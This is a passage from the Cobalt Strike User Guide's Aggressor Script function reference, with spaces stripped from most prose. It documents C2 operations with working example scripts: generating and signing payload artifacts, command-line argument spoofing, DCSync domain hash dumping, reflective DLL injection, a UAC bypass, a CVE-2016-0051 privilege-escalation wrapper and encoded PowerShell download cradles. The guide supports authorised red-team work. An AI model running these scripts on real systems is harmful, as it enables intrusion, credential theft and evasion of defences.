ReturnsalistofapplicationinformationinCobaltStrike'sdatamodel.Theseapplicationsare
|
||
resultsfromtheSystemProfiler.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationabouteachapplication.
|
||
Example
|
||
printAll(applications());
|
||
archives
|
||
ReturnsamassivelistofarchivedinformationaboutyouractivityfromCobaltStrike'sdata
|
||
model.ThisinformationisleanedonheavilytoreconstructyouractivitytimelineinCobalt
|
||
Strike'sreports.
|
||
Returns
|
||
Anarrayofdictionaryobjectswithinformationaboutyourteam'sactivity.
|
||
Example
|
||
foreach $index => $entry (archives()) {
|
||
println("\c3( $+ $index $+ )\o $entry");
|
||
}
|
||
artifact
|
||
CobaltStrikeUserGuide www.fortra.com page:261
|
||
|
||
AggressorScript/Functions
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager
|
||
instead.
|
||
Generatesastagerartifact(exe,dll)fromaCobaltStrikelistener
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-theartifacttype
|
||
$3-deprecated;thisparameternolongerhasanymeaning.
|
||
$4-x86|x64-thearchitectureofthegeneratedstager
|
||
Type Description
|
||
dll anx86DLL
|
||
dllx64 anx64DLL
|
||
exe aplainexecutable
|
||
powershell apowershellscript
|
||
python apythonscript
|
||
svcexe aserviceexecutable
|
||
vbscript aVisualBasicscript
|
||
Note
|
||
Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
|
||
Returns
|
||
Ascalarcontainingthespecifiedartifact.
|
||
Example
|
||
$data = artifact("my listener", "exe");
|
||
$handle = openf(">out.exe");
|
||
writeb($handle, $data);
|
||
closef($handle);
|
||
CobaltStrikeUserGuide www.fortra.com page:262
|
||
|
||
AggressorScript/Functions
|
||
artifact_general
|
||
Generatesapayloadartifactfromarbitraryshellcode.
|
||
Arguments
|
||
$1-theshellcode
|
||
$2-theartifacttype
|
||
$3-x86|x64-thearchitectureofthegeneratedpayload
|
||
Type Description
|
||
dll aDLL
|
||
exe aplainexecutable
|
||
powershell apowershellscript
|
||
python apythonscript
|
||
svcexe aserviceexecutable
|
||
Note
|
||
WhilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryanx86andx64
|
||
payload;thisfunctionwillonlypopulatethescriptwiththearchitectureargumentspecifiedas
|
||
$3
|
||
artifact_payload
|
||
Generatesastagelesspayloadartifact(exe,dll)fromaCobaltStrikelistenername
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-theartifacttype
|
||
$3-x86|x64-thearchitectureofthegeneratedpayload(stage)
|
||
$4-exitmethod:'thread'(leavethethreadwhendone)or'process'(exittheprocesswhen
|
||
done).Use'thread'ifinjectingintoanexistingprocess.
|
||
CobaltStrikeUserGuide www.fortra.com page:263
|
||
|
||
AggressorScript/Functions
|
||
$5–Astringvalueforthesystemcallmethod.Validvaluesare:
|
||
None:UsethestandardWindowsAPIfunction.
|
||
Direct:UsetheNt*versionofthefunction.
|
||
Indirect:JumptotheappropriateinstructionwithintheNt*versionofthefunction.
|
||
Type Description
|
||
dll aDLL
|
||
exe aplainexecutable
|
||
powershell apowershellscript
|
||
python apythonscript
|
||
raw rawpayloadstage
|
||
svcexe aserviceexecutable
|
||
$6-(optional)ThesupportingHTTPlibraryforgeneratedbeacons(wininet|winhttp|$null|blank
|
||
string).
|
||
Note
|
||
WhilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryanx86andx64
|
||
payload;thisfunctionwillonlypopulatethescriptwiththearchitectureargumentspecifiedas
|
||
$3
|
||
Example
|
||
$data = artifact_payload("my listener", "exe", "x86", “process”,
|
||
“Indirect”);
|
||
artifact_sign
|
||
SignanEXEorDLLfile
|
||
Arguments
|
||
$1-thecontentsoftheEXEorDLLfiletosign
|
||
Notes
|
||
CobaltStrikeUserGuide www.fortra.com page:264
|
||
|
||
AggressorScript/Functions
|
||
l Thisfunctionrequiresthatacode-signingcertificateisspecifiedinthisserver's
|
||
MalleableC2profile.Ifnocode-signingcertificateisconfigured,thisfunctionwillreturn
|
||
$1withnochanges.
|
||
l DO NOTsignanexecutableorDLLtwice.ThelibraryCobaltStrikeusesforcode-signing
|
||
willcreateaninvalid(second)signatureiftheexecutableorDLLisalreadysigned.
|
||
Returns
|
||
Ascalarcontainingthesignedartifact.
|
||
Example
|
||
# generate an artifact!
|
||
$data = artifact("my listener", "exe");
|
||
# sign it.
|
||
$data = artifact_sign($data);
|
||
# save it
|
||
$handle = openf(">out.exe");
|
||
writeb($handle, $data);
|
||
closef($handle);
|
||
artifact_stageless
|
||
DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_payload
|
||
instead.
|
||
Generatesastagelessartifact(exe,dll)froma(local)CobaltStrikelistener
|
||
Arguments
|
||
$1-thelistenername(mustbelocaltothisteamserver)
|
||
$2-theartifacttype
|
||
$3-x86|x64-thearchitectureofthegeneratedpayload(stage)
|
||
$4-proxyconfigurationstring
|
||
$5-callbackfunction.Thisfunctioniscalledwhentheartifactisready.The$1argumentisthe
|
||
stagelesscontent.
|
||
CobaltStrikeUserGuide www.fortra.com page:265
|
||
|
||
AggressorScript/Functions
|
||
Type Description
|
||
dll anx86DLL
|
||
dllx64 anx64DLL
|
||
exe aplainexecutable
|
||
powershell apowershellscript
|
||
python apythonscript
|
||
raw rawpayloadstage
|
||
svcexe aserviceexecutable
|
||
Notes
|
||
l Thisfunctionprovidesthestagelessartifactviaacallbackfunction.Thisisnecessary
|
||
becauseCobaltStrikegeneratespayloadstagesontheteam server.
|
||
l TheproxyconfigurationstringisthesamestringyouwouldusewithPayloads ->
|
||
Windows Stageless Payload.*direct*ignoresthelocalproxyconfigurationand
|
||
attemptsadirectconnection.protocol://user:[email protected]:port
|
||
specifieswhichproxyconfigurationtheartifactshoulduse.Theusernameand
|
||
passwordareoptional(e.g.,protocol://host:portisfine).Theacceptable
|
||
protocolsaresocksandhttp.Settheproxyconfigurationstringto$nullor""touse
|
||
thedefaultbehavior.Custom dialogsmayuse&drow_proxyservertosetthis.
|
||
l Thisfunctioncannotgenerateartifactsforlistenersonotherteam servers.Thisfunction
|
||
alsocannotgenerateartifactsforforeignlisteners.Limityouruseofthisfunctionto
|
||
locallisterswithstagesonly.Custom dialogsmayuse&drow_listener_stagetochoose
|
||
anacceptablelistenerforthisfunction.
|
||
l Note:whilethePythonartifactinCobaltStrikeisdesignedtosimultaneouslycarryan
|
||
x86andx64payload;thisfunctionwillonlypopulatethescriptwiththearchitecture
|
||
argumentspecifiedas$3
|
||
Example
|
||
sub ready {
|
||
local('$handle');
|
||
$handle = openf(">out.exe");
|
||
writeb($handle, $1);
|
||
closef($handle);
|
||
}
|
||
artifact_stageless("my listener", "exe", "x86", "", &ready);
|
||
CobaltStrikeUserGuide www.fortra.com page:266
|
||
|
||
AggressorScript/Functions
|
||
artifact_stager
|
||
Generatesastagerartifact(exe,dll)fromaCobaltStrikelistener
|
||
Arguments
|
||
$1-thelistenername
|
||
$2-theartifacttype
|
||
$3-x86|x64-thearchitectureofthegeneratedstager
|
||
Type Description
|
||
dll aDLL
|
||
exe aplainexecutable
|
||
powershell apowershellscript
|
||
python apythonscript
|
||
raw therawfile
|
||
svcexe aserviceexecutable
|
||
vbscript aVisualBasicscript
|
||
Note
|
||
Beawarethatnotalllistenerconfigurationshavex64stagers.Ifindoubt,usex86.
|
||
Returns
|
||
Ascalarcontainingthespecifiedartifact.
|
||
Example
|
||
$data = artifact_stager("my listener", "exe", "x86");
|
||
$handle = openf(">out.exe");
|
||
writeb($handle, $data);
|
||
closef($handle);
|
||
barch
|
||
CobaltStrikeUserGuide www.fortra.com page:267
|
||
|
||
AggressorScript/Functions
|
||
ReturnsthearchitectureofyourBeaconsession(e.g.,x86orx64)
|
||
Arguments
|
||
$1-theidforthebeacontopullmetadatafor
|
||
Note
|
||
Ifthearchitectureisunknown(e.g.,aDNSBeaconthathasn'tsentmetadatayet);thisfunction
|
||
willreturnx86.
|
||
Example
|
||
println("Arch is: " . barch($1));
|
||
bargue_add
|
||
ThisfunctionaddsanoptiontoBeacon'slistofcommandstospoofargumentsfor.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandtospoofargumentsfor.EnvironmentvariablesareOKheretoo.
|
||
$3-thefakeargumentstousewhenthespecifiedcommandisrun.
|
||
Notes
|
||
l Theprocessmatchisexact.IfBeacontriestolaunch"net.exe",itwillnotmatchnet,
|
||
NET.EXE,orc:\windows\system32\net.exe.Itwillonlymatchnet.exe.
|
||
l x86Beaconcanonlyspoofargumentsinx86childprocesses.Likewise,x64Beaconcan
|
||
onlyspoofargumentsinx64childprocesses.
|
||
l Therealargumentsarewrittentothememoryspacethatholdsthefakearguments.If
|
||
therealargumentsarelongerthanthefakearguments,thecommandlaunchwillfail.
|
||
Example
|
||
# spoof cmd.exe arguments.
|
||
bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");
|
||
CobaltStrikeUserGuide www.fortra.com page:268
|
||
|
||
AggressorScript/Functions
|
||
# spoof net arguments
|
||
bargue_add($1, "net", "user guest /active:no");
|
||
bargue_list
|
||
Listthecommands+fakeargumentsBeaconwillspoofargumentsfor.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
bargue_list($1);
|
||
bargue_remove
|
||
ThisfunctionremovesanoptiontoBeacon'slistofcommandstospoofargumentsfor.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thecommandtospoofargumentsfor.EnvironmentvariablesareOKheretoo.
|
||
Example
|
||
# don't spoof cmd.exe
|
||
bargue_remove($1, "%COMSPEC%");
|
||
base64_decode
|
||
Unwrapabase64-encodedstring
|
||
Arguments
|
||
$1-thestringtodecode
|
||
Returns
|
||
Theargumentprocessedbyabase64decoder
|
||
CobaltStrikeUserGuide www.fortra.com page:269
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
println(base64_decode(base64_encode("this is a test")));
|
||
base64_encode
|
||
Base64encodeastring
|
||
Arguments
|
||
$1-thestringtoencode
|
||
Returns
|
||
Theargumentprocessedbyabase64encoder
|
||
Example
|
||
println(base64_encode("this is a test"));
|
||
bblockdlls
|
||
Launchchildprocesseswithbinarysignaturepolicythatblocksnon-MicrosoftDLLsfrom
|
||
loadingintheprocessspace.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-trueorfalse;blocknon-MicrosoftDLLsinchildprocess
|
||
Note
|
||
ThisattributeisavailableinWindows10only.
|
||
Example
|
||
on beacon_initial {
|
||
binput($1, "blockdlls start");
|
||
CobaltStrikeUserGuide www.fortra.com page:270
|
||
|
||
AggressorScript/Functions
|
||
bblockdlls($1, true);
|
||
}
|
||
bbrowser
|
||
GeneratethebeaconbrowserGUIcomponent.ShowsonlyBeacons.
|
||
Returns
|
||
ThebeaconbrowserGUIobject(ajavax.swing.JComponent)
|
||
Example
|
||
addVisualization("Beacon Browser", bbrowser());
|
||
Seealso
|
||
&showVisualization
|
||
bbrowserpivot
|
||
StartaBrowserPivot
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thePIDtoinjectthebrowserpivotagentinto.
|
||
$3-thearchitectureofthetargetPID(x86|x64)
|
||
Example
|
||
bbrowserpivot($1, 1234, "x86");
|
||
bbrowserpivot_stop
|
||
StopaBrowserPivot
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:271
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
bbrowserpivot_stop($1);
|
||
bbypassuac
|
||
REMOVED Removed in Cobalt Strike 4.0.
|
||
bcancel
|
||
Cancelafiledownload
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thefiletocancelorawildcard.
|
||
Example
|
||
item "&Cancel Downloads" {
|
||
bcancel($1, "*");
|
||
}
|
||
bcd
|
||
AskaBeacontochangeit'scurrentworkingdirectory.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thefoldertochangeto.
|
||
Example
|
||
# create a command to change to the user's home directory
|
||
alias home {
|
||
CobaltStrikeUserGuide www.fortra.com page:272
|
||
|
||
AggressorScript/Functions
|
||
$home = "c:\\users\\" . binfo($1, "user");
|
||
bcd($1, $home);
|
||
}
|
||
bcheckin
|
||
AskaBeacontocheckin.Thisisbasicallyano-opforBeacon.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
item "&Checkin" {
|
||
binput($1, "checkin");
|
||
bcheckin($1);
|
||
}
|
||
bclear
|
||
Thisisthe"oops"command.Itclearsthequeuedtasksforthespecifiedbeacon.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
bclear($1);
|
||
bconnect
|
||
AskBeacon(orSSHsession)toconnecttoaBeaconpeeroveraTCPsocket
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetargettoconnectto
|
||
CobaltStrikeUserGuide www.fortra.com page:273
|
||
|
||
AggressorScript/Functions
|
||
$3-(optional)theporttouse.Defaultprofileportisusedotherwise.
|
||
Note
|
||
Use&beacon_linkifyouwantascriptfunctionthatwillconnectorlinkbasedonalistener
|
||
configuration.
|
||
Example
|
||
bconnect($1, "DC");
|
||
bcovertvpn
|
||
AskBeacontodeployaCovertVPNclient.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-theCovertVPNinterfacetodeploy
|
||
$3-theIPaddressoftheinterface[ontarget]tobridgeinto
|
||
$4-(optional)theMACaddressoftheCovertVPNinterface
|
||
Example
|
||
bcovertvpn($1, "phear0", "172.16.48.18");
|
||
bcp
|
||
AskBeacontocopyafileorfolder.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thefileorfoldertocopy
|
||
$3-thedestination
|
||
CobaltStrikeUserGuide www.fortra.com page:274
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");
|
||
bdata
|
||
GetmetadataforaBeaconsession.
|
||
Arguments
|
||
$1-theidforthebeacontopullmetadatafor
|
||
Returns
|
||
AdictionaryobjectwithmetadataabouttheBeaconsession.
|
||
Example
|
||
println(bdata("1234"));
|
||
bdcsync
|
||
Usemimikatz'sdcsynccommandtopullauser'spasswordhashfromadomaincontroller.This
|
||
functionrequiresadomainadministratortrustrelationship.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-fullyqualifiednameofthedomain
|
||
$3-(optional)DOMAIN\usertopullhashesfor
|
||
$4-(optional)thePIDtoinjectthedcsynccommandintoor$null
|
||
$5-(optional)thearchitectureofthetargetPID(x86|x64)or$null
|
||
Note
|
||
CobaltStrikeUserGuide www.fortra.com page:275
|
||
|
||
AggressorScript/Functions
|
||
If$3isleftout,dcsyncwilldumpalldomainhashes.
|
||
Examples
|
||
Spawnatemporaryprocess
|
||
# dump a specific account
|
||
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");
|
||
# dump all accounts
|
||
bdcsync($1, "PLAYLAND.testlab");
|
||
Injectintothespecifiedprocess
|
||
# dump a specific account
|
||
bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator", 1234, "x64");
|
||
# dump all accounts
|
||
bdcsync($1, "PLAYLAND.testlab", $null, 1234, "x64");
|
||
bdesktop
|
||
StartaVNCsession.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
Example
|
||
item "&Desktop (VNC)" {
|
||
bdesktop($1);
|
||
}
|
||
bdllinject
|
||
InjectaReflectiveDLLintoaprocess.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:276
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thePIDtoinjecttheDLLinto
|
||
$3-thelocalpathtotheReflectiveDLL
|
||
Example
|
||
bdllinject($1, 1234, script_resource("test.dll"));
|
||
bdllload
|
||
CallLoadLibrary()inaremoteprocesswiththespecifiedDLL.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thetargetprocessPID
|
||
$3-theon-targetpathtoaDLL
|
||
Note
|
||
TheDLLmustbethesamearchitectureasthetargetprocess.
|
||
Example
|
||
bdllload($1, 1234, "c:\\windows\\mystuff.dll");
|
||
bdllspawn
|
||
SpawnaReflectiveDLLasaBeaconpost-exploitationjob.
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thelocalpathtotheReflectiveDLL
|
||
$3-aparametertopasstotheDLL
|
||
CobaltStrikeUserGuide www.fortra.com page:277
|
||
|
||
AggressorScript/Functions
|
||
$4-ashortdescriptionofthispostexploitationjob(showsupinjobsoutput)
|
||
$5-true/false;useimpersonatedtokenwhenrunningthispost-exjob?
|
||
$6-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Notes
|
||
l Thisfunctionwillspawnanx86processiftheReflectiveDLLisanx86DLL.Likewise,if
|
||
theReflectiveDLLisanx64DLL,thisfunctionwillspawnanx64process.
|
||
l Awell-behavedReflectiveDLLfollowstheserules:
|
||
o ReceivesaparameterviathereservedDllMainparameterwhentheDLL_
|
||
PROCESS_ATTACHreasonisspecified.
|
||
o PrintsmessagestoSTDOUT
|
||
o Callsfflush(stdout)toflushSTDOUT
|
||
o CallsExitProcess(0)whendone.Thiskillsthespawnedprocesstohostthe
|
||
capability.
|
||
Example(ReflectiveDll.c)
|
||
ThisexampleisbasedonStephenFewer'sReflectiveDLLInjectionProject:
|
||
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
|
||
BOOL bReturnValue = TRUE;
|
||
switch( dwReason ) {
|
||
case DLL_QUERY_HMODULE:
|
||
if( lpReserved != NULL )
|
||
*(HMODULE *)lpReserved = hAppInstance;
|
||
break;
|
||
case DLL_PROCESS_ATTACH:
|
||
hAppInstance = hinstDLL;
|
||
/* print some output to the operator */
|
||
if (lpReserved != NULL) {
|
||
printf("Hello from test.dll.
|
||
Parameter is '%s'\n", (char *)lpReserved);
|
||
}
|
||
else {
|
||
printf("Hello from test.dll. There is no parameter\n");
|
||
}
|
||
/* flush STDOUT */
|
||
CobaltStrikeUserGuide www.fortra.com page:278
|
||
|
||
AggressorScript/Functions
|
||
fflush(stdout);
|
||
/* we're done, so let's exit */
|
||
ExitProcess(0);
|
||
break;
|
||
case DLL_PROCESS_DETACH:
|
||
case DLL_THREAD_ATTACH:
|
||
case DLL_THREAD_DETACH:
|
||
break;
|
||
}
|
||
return bReturnValue;
|
||
}
|
||
Example(AggressorScript)
|
||
alias hello {
|
||
bdllspawn($1, script_resource("reflective_dll.dll"), $2,
|
||
"test dll", 5000, false);
|
||
}
|
||
bdownload
|
||
AskaBeacontodownloadafile
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
$2-thefiletorequest
|
||
Example
|
||
bdownload($1, "c:\\sysprep.inf");
|
||
bdrives
|
||
AskBeacontolistthedrivesonthecompromisedsystem
|
||
Arguments
|
||
$1-theidforthebeacon.ThismaybeanarrayorasingleID.
|
||
CobaltStrikeUserGuide www.fortra.com page:279
|
||
|
||
AggressorScript/Functions
|
||
Example
|
||
item "&Drives" {
|
||
binput($1, "drives");
|
||
bdrives($1);
|
||
}
|
||
beacon_command_describe
|
||
DescribeaBeaconcommand.
|
||
Returns
|
||
AstringdescriptionoftheBeaconcommand.
|
||
Arguments
|
||
$1-thecommand
|
||
Example
|
||
println(beacon_command_describe("ls"));
|
||
beacon_command_detail
|
||
GetthehelpinformationforaBeaconcommand.
|
||
Returns
|
||
AstringwithhelpfulinformationaboutaBeaconcommand.
|
||
Arguments
|
||
$1-thecommand
|
||
Example
|
||
println(beacon_command_detail("ls"));
|
||
CobaltStrikeUserGuide www.fortra.com page:280
|
||
|
||
AggressorScript/Functions
|
||
beacon_command_register
|
||
RegisterhelpinformationforaBeaconcommand.
|
||
Arguments
|
||
$1-thecommand
|
||
$2-theshortdescriptionofthecommand
|
||
$3-thelong-formhelpforthecommand.
|
||
Example
|
||
alis echo {
|
||
blog($1, "You typed: " . substr($1, 5));
|
||
}
|
||
beacon_command_register(
|
||
"echo",
|
||
"echo text to beacon log",
|
||
"Synopsis: echo [arguments]\n\nLog arguments to the beacon console");
|
||
beacon_commands
|
||
GetalistofBeaconcommands.
|
||
Returns
|
||
AnarrayofBeaconcommands.
|
||
Example
|
||
printAll(beacon_commands());
|
||
beacon_data
|
||
GetmetadataforaBeaconsession.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:281
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacontopullmetadatafor
|
||
Returns
|
||
AdictionaryobjectwithmetadataabouttheBeaconsession.
|
||
Example
|
||
println(beacon_data("1234"));
|
||
beacon_elevator_describe
|
||
DescribeaBeaconcommandelevatorexploit
|
||
Returns
|
||
AstringdescriptionoftheBeaconcommandelevator
|
||
Arguments
|
||
$1-theexploit
|
||
Example
|
||
println(beacon_elevator_describe("uac-token-duplication"));
|
||
SeeAlso
|
||
&beacon_elevator_register,&beacon_elevators,&belevate_command
|
||
beacon_elevator_register
|
||
RegisteraBeaconcommandelevatorwithCobaltStrike.Thisaddsanoptiontotherunasadmin
|
||
command.
|
||
Arguments
|
||
$1-theexploitshortname
|
||
$2-adescriptionoftheexploit
|
||
CobaltStrikeUserGuide www.fortra.com page:282
|
||
|
||
AggressorScript/Functions
|
||
$3-thefunctionthatimplementstheexploit($1istheBeaconID,$2thecommandand
|
||
arguments)
|
||
Example
|
||
# Integrate schtasks.exe (via SilentCleanup) Bypass UAC attack
|
||
# Sourced from Empire:
|
||
https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc
|
||
sub schtasks_elevator {
|
||
local('$handle $script $oneliner $command');
|
||
# acknowledge this command
|
||
btask($1, "Tasked Beacon to execute $2 in a high integrity context",
|
||
"T1088");
|
||
# read in the script
|
||
$handle = openf(getFileProper(script_resource("modules"), "Invoke-
|
||
EnvBypass.ps1"));
|
||
$script = readb($handle, -1);
|
||
closef($handle);
|
||
# host the script in Beacon
|
||
$oneliner = beacon_host_script($1, $script);
|
||
# base64 encode the command
|
||
$command = transform($2, "powershell-base64");
|
||
# run the specified command via this exploit.
|
||
bpowerpick!($1, "Invoke-EnvBypass -Command \" $+ $command $+ \"",
|
||
$oneliner);
|
||
}
|
||
beacon_elevator_register("uac-schtasks", "Bypass UAC with schtasks.exe (via
|
||
SilentCleanup)", &schtasks_elevator);
|
||
SeeAlso
|
||
&beacon_elevator_describe,&beacon_elevators,&belevate_command
|
||
beacon_elevators
|
||
GetalistofcommandelevatorexploitsregisteredwithCobaltStrike.
|
||
Returns
|
||
CobaltStrikeUserGuide www.fortra.com page:283
|
||
|
||
AggressorScript/Functions
|
||
AnarrayofBeaconcommandelevators
|
||
Example
|
||
printAll(beacon_elevators());
|
||
Seealso
|
||
&beacon_elevator_describe,&beacon_elevator_register,&belevate_command
|
||
beacon_execute_job
|
||
Runacommandandreportitsoutputtotheuser.
|
||
Arguments
|
||
$1-theBeaconID
|
||
$2-thecommandtorun(environmentvariablesareresolved)
|
||
$3-thecommandarguments(environmentvariablesarenotresolved).
|
||
$4-flagsthatchangehowthejobislaunched(e.g.,1=disableWOW64filesystemredirection)
|
||
Notes
|
||
l Thestring$2and$3arecombinedas-isintoacommandline.Makesureyoubegin$3
|
||
withaspace!
|
||
l Thisisthemechanism CobaltStrikeusesforitsshellandpowershellcommands.
|
||
Example
|
||
alias shell {
|
||
local('$args');
|
||
$args = substr($0, 6);
|
||
btask($1, "Tasked beacon to run: $args", "T1059");
|
||
beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
|
||
}
|
||
beacon_exploit_describe
|
||
CobaltStrikeUserGuide www.fortra.com page:284
|
||
|
||
AggressorScript/Functions
|
||
DescribeaBeaconexploit
|
||
Returns
|
||
AstringdescriptionoftheBeaconexploit
|
||
Arguments
|
||
$1-theexploit
|
||
Example
|
||
println(beacon_exploit_describe("ms14-058"));
|
||
SeeAlso
|
||
&beacon_exploit_register,&beacon_exploits,&belevate
|
||
beacon_exploit_register
|
||
RegisteraBeaconprivilegeescalationexploitwithCobaltStrike.Thisaddsanoptiontothe
|
||
elevatecommand.
|
||
Arguments
|
||
$1-theexploitshortname
|
||
$2-adescriptionoftheexploit
|
||
$3-thefunctionthatimplementstheexploit($1istheBeaconID,$2isthelistener)
|
||
Example
|
||
# Integrate windows/local/ms16_016_webdav from Metasploit
|
||
# https://github.com/rapid7/metasploit-
|
||
framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb
|
||
sub ms16_016_exploit {
|
||
local('$stager');
|
||
# check if we're on an x64 system and error out.
|
||
CobaltStrikeUserGuide www.fortra.com page:285
|
||
|
||
AggressorScript/Functions
|
||
if (-is64 $1) {
|
||
berror($1, "ms16-016 exploit is x86 only");
|
||
return;
|
||
}
|
||
# acknowledge this command
|
||
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016",
|
||
"T1068");
|
||
# generate our shellcode
|
||
$stager = payload($2, "x86");
|
||
# spawn a Beacon post-ex job with the exploit DLL
|
||
bdllspawn!($1, getFileProper(script_resource("modules"), "cve-2016-
|
||
0051.x86.dll"), $stager, "ms16-016", 5000);
|
||
# link to our payload if it's a TCP or SMB Beacon
|
||
beacon_link($1, $null, $2);
|
||
}
|
||
beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege
|
||
Escalation (CVE 2016-0051)", &ms16_016_exploit);
|
||
SeeAlso
|
||
&beacon_exploit_describe,&beacon_exploits,&belevate
|
||
beacon_exploits
|
||
GetalistofprivilegeescalationexploitsregisteredwithCobaltStrike.
|
||
Returns
|
||
AnarrayofBeaconexploits.
|
||
Example
|
||
printAll(beacon_exploits());
|
||
Seealso
|
||
&beacon_exploit_describe,&beacon_exploit_register,&belevate
|
||
CobaltStrikeUserGuide www.fortra.com page:286
|
||
|
||
AggressorScript/Functions
|
||
beacon_host_imported_script
|
||
LocallyhostapreviouslyimportedPowerShellscriptwithinBeaconandreturnashortscript
|
||
thatwilldownloadandinvokethisscript.
|
||
Arguments
|
||
$1-theidoftheBeacontohostthisscriptwith.
|
||
Returns
|
||
AshortPowerShellscripttodownloadandevaluatethepreviouslyscriptwhenrun.Howthis
|
||
one-linerisusedisuptoyou!
|
||
Example
|
||
alias powershell {
|
||
local('$args $cradle $runme $cmd');
|
||
# $0 is the entire command with no parsing.
|
||
$args = substr($0, 11);
|
||
# generate the download cradle (if one exists) for an imported PowerShell
|
||
script
|
||
$cradle = beacon_host_imported_script($1);
|
||
# encode our download cradle AND cmdlet+args we want to run
|
||
$runme = base64_encode( str_encode($cradle . $args, "UTF-16LE") );
|
||
# Build up our entire command line.
|
||
$cmd = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";
|
||
# task Beacon to run all of this.
|
||
btask($1, "Tasked beacon to run: $args", "T1086");
|
||
beacon_execute_job($1, "powershell", $cmd, 1);
|
||
}
|
||
beacon_host_script
|
||
LocallyhostaPowerShellscriptwithinBeaconandreturnashortscriptthatwilldownloadand
|
||
invokethisscript.Thisfunctionisawaytorunlargescriptswhenthereareconstraintsonthe
|
||
lengthofyourPowerShellone-liner.
|
||
CobaltStrikeUserGuide www.fortra.com page:287
|
||
|
||
AggressorScript/Functions
|
||
Arguments
|
||
$1-theidoftheBeacontohostthisscriptwith.
|
||
$2-thescriptdatatohost.
|
||
Returns
|
||
AshortPowerShellscripttodownloadandevaluatethescriptwhenrun.Howthisone-lineris
|
||
usedisuptoyou!
|
||
Example
|
||
alias test {
|
||
local('$script $hosted');
|
||
$script = "2 + 2";
|
||
$hosted = beacon_host_script($1, $script);
|
||
binput($1, "powerpick $hosted");
|
||
bpowerpick($1, $hosted);
|
||
}
|
||
beacon_ids
|
||
GettheIDofallBeaconscallingbacktothisCobaltStriketeamserver.
|
||
Returns
|
||
AnarrayofbeaconIDs
|
||
Example
|
||
foreach $bid (beacon_ids()) {
|
||
println("Bid: $bid");
|
||
}
|
||
beacon_info
|
||
GetinformationfromaBeaconsession'smetadata.
|
||
Arguments
|
||
CobaltStrikeUserGuide www.fortra.com page:288
|
||
|
||
AggressorScript/Functions
|
||
$1-theidforthebeacontopullmetadatafor
|
||
$2-thekeytoextract
|
||
Returns
|
||
Astringwiththerequestedinformation.
|
||
Example
|
||
println("User is: " . beacon_info("1234", "user"));
|
||
println("PID is: " . beacon_info("1234", "pid"));
|
||
beacon_inline_execute
|
||
ExecuteaBeaconObjectFile
|
||
Arguments
|
||
$1-theidfortheBeacon
|
||
$2-astringcontainingtheBOFfile
|
||
$3-theentrypointtocall
|
||
$4-packedargumentstopasstotheBOFfile
|
||
$5-(optional)callbackfunctionwiththeresults.Argumentstothecallbackare:$1=beaconID,
|
||
$2=results,$3=informationmap
|
||
Note
|
||
TheCobaltStrikedocumentationhasapagespecifictoBOFfiles.SeeBeacon Object Files on
|
||
page 171.
|
||
Example(hello.c)
|
||
/*
|
||
* Compile with:
|
||
* x86_64-w64-mingw32-gcc -c hello.c -o hello.x64.o
|
||
* i686-w64-mingw32-gcc -c hello.c -o hello.x86.o
|
||
*/
|
||
CobaltStrikeUserGuide www.fortra.com page:289
|
||
|
||
